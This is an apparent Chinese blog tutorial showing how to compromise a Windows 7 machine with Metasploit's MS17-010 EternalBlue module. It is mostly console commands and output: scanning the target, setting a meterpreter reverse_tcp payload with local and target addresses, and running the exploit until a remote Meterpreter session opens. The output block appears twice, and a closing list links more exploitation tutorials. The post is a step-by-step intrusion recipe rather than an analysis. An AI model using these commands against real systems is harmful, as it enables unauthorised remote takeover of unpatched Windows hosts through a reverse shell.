MSF下利用MS17-010漏洞入侵win7主机
2017-06-07 17:06
573 查看
查看目标主机是否存在此漏洞:
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 good MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
//搜索ms17-010关键字,可以找到两个工具。第一个是检测是否存在漏洞工具,第二个是入侵工具
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
2.入侵主机
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
[*] 192.168.1.102:445 - Connecting to target for exploitation.
[+] 192.168.1.102:445 - Connection established for exploitation.
[+] 192.168.1.102:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.102:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.1.102:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.1.102:445 - 0x00000010 61 73 69 63 20 36 2e 31 00 asic 6.1
[+] 192.168.1.102:445 - Target arch selected valid for OS indicated by DCE/RPC reply
[*] 192.168.1.102:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.102:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.102:445 - Starting non-paged pool grooming
[+] 192.168.1.102:445 - Sending SMBv2 buffers
[+] 192.168.1.102:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.102:445 - Sending final SMBv2 buffers.
[*] 192.168.1.102:445 - Sending last fragment of exploit packet!
[*] 192.168.1.102:445 - Receiving response from exploit packet
[+] 192.168.1.102:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.102:445 - Sending egg to corrupted connection.
[*] 192.168.1.102:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.102:49168) at 2017-06-07 15:23:51 +0800
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
msf > search ms17-010Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_ms17_010 normal MS17-010 SMB RCE Detection
exploit/windows/smb/ms17_010_eternalblue 2017-03-14 good MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
//搜索ms17-010关键字,可以找到两个工具。第一个是检测是否存在漏洞工具,第二个是入侵工具
msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.102 //设置目标主机IP地址rhosts => 192.168.1.102
msf auxiliary(smb_ms17_010) > run[+] 192.168.1.102:445 - Host is likely VULNERABLE to MS17-010! (Windows 7 Home Basic 7601 Service Pack 1) //存在漏洞
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
2.入侵主机
msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp //调用反向连接shellpayload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > show options //查看选项Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts 3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.104 //配置本地主机IPlhost => 192.168.1.104
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.102 //配置目标主机IPrhost => 192.168.1.102
msf exploit(ms17_010_eternalblue) > exploit[*] Started reverse TCP handler on 192.168.1.104:4444
[*] 192.168.1.102:445 - Connecting to target for exploitation.
[+] 192.168.1.102:445 - Connection established for exploitation.
[+] 192.168.1.102:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.102:445 - CORE raw buffer dump (25 bytes)
[*] 192.168.1.102:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 48 6f 6d 65 20 42 Windows 7 Home B
[*] 192.168.1.102:445 - 0x00000010 61 73 69 63 20 36 2e 31 00 asic 6.1
[+] 192.168.1.102:445 - Target arch selected valid for OS indicated by DCE/RPC reply
[*] 192.168.1.102:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.102:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.102:445 - Starting non-paged pool grooming
[+] 192.168.1.102:445 - Sending SMBv2 buffers
[+] 192.168.1.102:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.102:445 - Sending final SMBv2 buffers.
[*] 192.168.1.102:445 - Sending last fragment of exploit packet!
[*] 192.168.1.102:445 - Receiving response from exploit packet
[+] 192.168.1.102:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.102:445 - Sending egg to corrupted connection.
[*] 192.168.1.102:445 - Triggering free of corrupted buffer.
[*] Sending stage (1189423 bytes) to 192.168.1.102
[*] Meterpreter session 1 opened (192.168.1.104:4444 -> 192.168.1.102:49168) at 2017-06-07 15:23:51 +0800
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.102:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > //建立meterpreter回话。在该模式下可以运行很多对目标主机的操作。
相关文章推荐
- 实战!利用MSF批量扫描校园网中含有MS17_010漏洞的主机并入侵
- 利用NSA的MS17-010漏洞利用工具实现Win 7和Win Server 2008系统入侵
- 使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程
- ms17-010永恒之蓝漏洞利用
- 漏洞利用之NSA永恒之蓝(Eternalblue)ms17-010
- 黑客入侵阿里云主机挖矿以及利用redis漏洞扫描抓取肉鸡
- MS17-010移植到MSF中进行入侵
- 20145330 《网络对抗》 Eternalblue(MS17-010)漏洞复现与S2-045漏洞的利用及修复
- metasploit利用IE漏洞XSS挂马拿内网主机
- ms17-010永恒之蓝漏洞复现
- msf_web_delivery模块漏洞(win7以上注册表)
- 利用Ossim系统进行主机漏洞扫描
- 黑客如何利用文件包含漏洞进行网站入侵
- win7主机和linux虚拟机利用WinScp传输文件
- ms17-010利用
- metasploit利用IE漏洞XSS挂马拿内网主机
- MSF利用最新IE最新漏洞
- 利用win7黏滞键漏洞破解win7用户密码
- Win7下 MS12_020 漏洞利用
- 使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程